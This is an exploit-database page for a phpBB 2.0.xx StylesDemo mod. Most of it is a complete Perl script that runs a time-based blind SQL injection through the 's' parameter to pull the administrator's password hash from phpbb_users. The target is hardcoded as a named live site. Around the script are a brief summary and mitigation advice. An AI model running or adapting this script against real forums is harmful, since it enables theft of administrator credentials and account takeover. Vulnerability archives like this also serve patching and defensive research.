header-logo
Suggest Exploit
vendor:
StylesDemo Mod for phpbb
by:
nexen
5.5
CVSS
MEDIUM
XSS and SQL Injection
CWE
Product Name: StylesDemo Mod for phpbb
Affected Version From: phpbb 2.0.xx
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

Ktauber.com StylesDemo Mod for phpbb 2.0.xx Multiple Vulnerabilities

This exploit allows an attacker to perform XSS and SQL injection attacks on the Ktauber.com StylesDemo Mod for phpbb 2.0.xx. The exploit uses LWP::UserAgent and HTTP::Request::Common modules to send HTTP requests and retrieve responses. The vulnerable site is specified in the configuration as http://www.forumup.com/stylesdemo/

Mitigation:

To mitigate the XSS vulnerability, input validation should be implemented to ensure that user-supplied data is properly encoded or sanitized before being displayed. To mitigate the SQL injection vulnerability, prepared statements or parameterized queries should be used to prevent malicious SQL queries.
Source

Exploit-DB raw data:

#---------------------------------------------------------------
# ____            __________         __             ____  __   
#/_   | ____     |__\_____  \  _____/  |_          /_   |/  |_ 
# |   |/    \    |  | _(__  <_/ ___\   __\  ______  |   \   __\
# |   |   |  \   |  |/       \  \___|  |   /_____/  |   ||  |  
# |___|___|  /\__|  /______  /\___  >__|            |___||__|  
#          \/\______|      \/     \/                           
#---------------------------------------------------------------
#
#Http://www.inj3ct-it.org	    Staff[at]inj3ct-it[dot]org	
#
#--------------------------------------------------------------
#
#Ktauber.com StylesDemo Mod for phpbb 2.0.xx Multiple Vulnerabilites
#
#---------------------------------------------------------------
#
# Coded by nexen
#
# GreetZ: Rossi46go for code 
#
# Description:
#
#XSS and SQL Injection
#
#---------------------------------------------------------------
#
#
#
#
#---------------------------------------------------------------
#exploit.pl
#---------------------------------------------------------------
#
#
#
use LWP::UserAgent;
use HTTP::Request::Common;
use Time::HiRes;
######################################## CONFIGURAZIONE EXPLOIT ##########################################################################
$sito = "http://www.forumup.com/stylesdemo/"; # insert vulnerable site as http://[site]/[path]/
##########################################################################################################################################
$var = "1";
my $hash;
@array = (48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102);

sub richiesta {
$var = $_[0];
$ua = LWP::UserAgent->new;
$inizio=Time::HiRes::time();
$response = $ua->request(GET $var,
s => $var);
$response->is_success() || print("$!\n");
$fine=Time::HiRes::time();
$tempo=$fine-$inizio;
return $tempo
}

sub aggiorna{
system("cls");
print "Tempo sql : " . $_[4] . " secondi\n";
print "Hash : " . $_[3] . "\n";
}

#print richiesta;

for ($i=1;$i<33;$i++)
{
for ($j=0;$j<16;$j++)
{

$var=$sito."index.php?s=(SELECT IF((ASCII(SUBSTRING(`user_password`,".$i.",1))=".$array[$j]."),benchmark(200000000,CHAR(0)),0) FROM phpbb_users WHERE `user_id`=2)/*";
$tempo=richiesta($var);
aggiorna($host,$tempodefault,$j,$hash,$tempo,$i);
if($tempo>9)
{
$tempo=richiesta($var);
aggiorna($host,$tempodefault,$j,$hash,$tempo,$i);
if($tempo>9)
{
$hash .=chr($array[$j]);
aggiorna($host,$tempodefault,$j,$hash,$tempo,$i);
$j=200;
}
}

}
if($i==1)
{
if($hash eq "")
{
$i=200;
print "Attacco Fallito Sito Fixato\n";
}
}
}


print "Attacco Terminato\n\n";

system("pause");

# milw0rm.com [2007-09-18]

Navigation

Suggest Exploit

Services By CQR